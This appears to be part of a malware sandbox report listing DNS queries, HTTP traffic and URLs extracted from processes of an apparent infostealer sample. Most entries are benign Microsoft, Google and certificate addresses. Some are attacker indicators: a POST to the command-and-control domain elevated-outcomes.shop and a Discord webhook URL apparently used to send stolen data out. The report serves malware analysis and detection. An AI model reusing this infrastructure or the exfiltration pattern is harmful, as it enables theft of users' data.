                  Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rc 'nonce-BHyI5foKXl6Izt4OLqkzqV5mufPSMUKbhwKsIRGr5Bs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
                  Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                  Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com I equals www.youtube.com (Youtube)
                  Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: ZuYwLYOGpsYmohRivNRzySjfrEDfR.ZuYwLYOGpsYmohRivNRzySjfrEDfR
                  Source: global trafficDNS traffic detected: DNS query: elevated-outcomes.shop
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                  Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global trafficDNS traffic detected: DNS query: apis.google.com
                  Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global trafficDNS traffic detected: DNS query: c.msn.com
                  Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                  Source: global trafficDNS traffic detected: DNS query: api.msn.com
                  Source: global trafficDNS traffic detected: DNS query: play.google.com
                  Source: unknownHTTP traffic detected: POST /NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV88cNCbNkQ5co2yv9Yi3V%2B4UngeF2wrQ9x0YVDwI%2Fnw%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Content-Length: 147Host: elevated-outcomes.shop
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                  Source: RegAsm.exe, 0000001E.00000002.2523210582.0000000001A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: RegAsm.exe, 0000001E.00000002.2522471882.00000000019A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV/e&
                  Source: curcuma.exe, 00000024.00000003.2420129542.000002428F06A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402711862.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e5.i.lencr.org/0A
                  Source: curcuma.exe, 00000024.00000003.2420129542.000002428F06A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402711862.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e5.o.lencr.org0
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: curcuma.exe, 00000024.00000003.2420129542.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msn.com
                  Source: ADFoyxP.exe, 00000000.00000002.2123799462.0000000000408000.00000002.00000001.01000000.00000003.sdmp, ADFoyxP.exe, 00000000.00000000.1242829595.0000000000408000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: RegAsm.exe, 0000001E.00000002.2523751705.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: Seat.com, 00000013.00000003.1371153350.000000000460A000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 00000013.00000000.1359198042.0000000000CA5000.00000002.00000001.01000000.00000007.sdmp, TradeHub.com, 0000001B.00000002.1436576293.0000000000435000.00000002.00000001.01000000.00000009.sdmp, TradeHub.com, 0000001D.00000000.1470180369.0000000000435000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alekberg.net/privacy
                  Source: curcuma.exe, 00000024.00000003.2295960639.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com%22
                  Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.js
                  Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.js5.55
                  Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.jst
                  Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.005fa5d1a45c7a2d7a6d.jstt
                  Source: curcuma.exe, 00000024.00000003.2416786438.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/diagnostic-web-vitals.95b1542329807b1f42ef.js
                  Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.js
                  Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.jsepoch
                  Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.jsnce_epocht
                  Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.jst
                  Source: curcuma.exe, 00000024.00000003.2344877173.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js
                  Source: curcuma.exe, 00000024.00000003.2344877173.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js5
                  Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.jsibox
                  Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js
                  Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js.55
                  Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js5
                  Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js6:34:43Z
                  Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jsjs
                  Source: curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jsm
                  Source: curcuma.exe, 00000024.00000003.2332750184.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jst
                  Source: curcuma.exe, 00000024.00000003.2433880963.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.163df88679884777ae49.js
                  Source: curcuma.exe, 00000024.00000003.2308688761.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2295206449.000002428F062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2403525425.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/&os=windows&locale=
                  Source: curcuma.exe, 00000024.00000003.2433987605.000002428EFE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/service/news/feed/pages/weblayout?User=m-3B61B35AD2B06E2C0F4DA6F2D3A26FDA&act
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/statics/icons/favicon.ico
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/statics/icons/favicon.icoa
                  Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.png
                  Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.pngM
                  Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/statics/icons/favicon_newtabpage.pngu
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svg
                  Source: curcuma.exe, 00000024.00000003.2403687246.000002428EFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/brand/new-msn-logo-color-black.svgt
                  Source: curcuma.exe, 00000024.00000003.2404283955.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/FeedSettings.svg
                  Source: curcuma.exe, 00000024.00000003.2419008052.0000024292DCB000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2401955377.0000024292DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/FeedSettings.svg=APP_ANON&source=marke
                  Source: curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://azureedge.net
                  Source: curcuma.exe, 00000024.00000003.2401155848.000002428F06A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.
                  Source: curcuma.exe, 00000024.00000003.2404283955.000002428EFE2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2418196116.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
                  Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                  Source: curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2357236044.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusinessu
                  Source: curcuma.exe, 00000024.00000003.2404159872.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gif?rnd=1741365293756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&t
                  Source: curcuma.exe, 00000024.00000003.2308688761.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2295206449.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2321094941.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
                  Source: curcuma.exe, 00000024.00000003.2308515239.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.googleusercontent.com/crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5
                  Source: curcuma.exe, 00000024.00000003.2357444651.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2419889648.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308688761.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402464885.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report
                  Source: curcuma.exe, 00000024.00000002.2521090954.000002428F011000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: curcuma.exe, 00000024.00000003.2357444651.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnt
                  Source: curcuma.exe, 00000024.00000003.2419889648.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2308688761.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2402464885.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/reportcat=msn
                  Source: curcuma.exe, 00000024.00000003.2357444651.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385582270.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369710156.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/reportt
                  Source: curcuma.exe, 00000024.00000003.2344877173.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
                  Source: curcuma.exe, 00000024.00000003.2383601149.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacy
                  Source: curcuma.exe, 00000024.00000003.2383601149.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacyquery
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
                  Source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/Char
                  Source: curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
                  Source: curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
                  Source: curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
                  Source: curcuma.exe, 00000024.00000003.2307412951.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cox.net/dns-query
                  Source: curcuma.exe, 00000024.00000003.2320033823.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.familyshield.opendns.com/dns-query
                  Source: curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset1/asset
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/assetch
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/assetexternal%26uc
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/assett
                  Source: curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                  Source: curcuma.exe, 00000024.00000003.2386235587.000002428EFE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/assetetas
                  Source: curcuma.exe, 00000024.00000003.2416786438.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/assett
                  Source: curcuma.exe, 00000024.00000003.2416786438.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/assett0
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                  Source: curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/assetet
                  Source: curcuma.exe, 00000024.00000003.2333644311.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                  Source: curcuma.exe, 00000024.00000003.2368846499.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2369488163.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2385044514.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/assetng
                  Source: curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                  Source: curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset/ass
                  Source: curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/assetShor
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2399463864.000002428F06B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2400353941.000002428F06B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                  Source: curcuma.exe, 00000024.00000003.2368684737.000002428F04B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/assetn
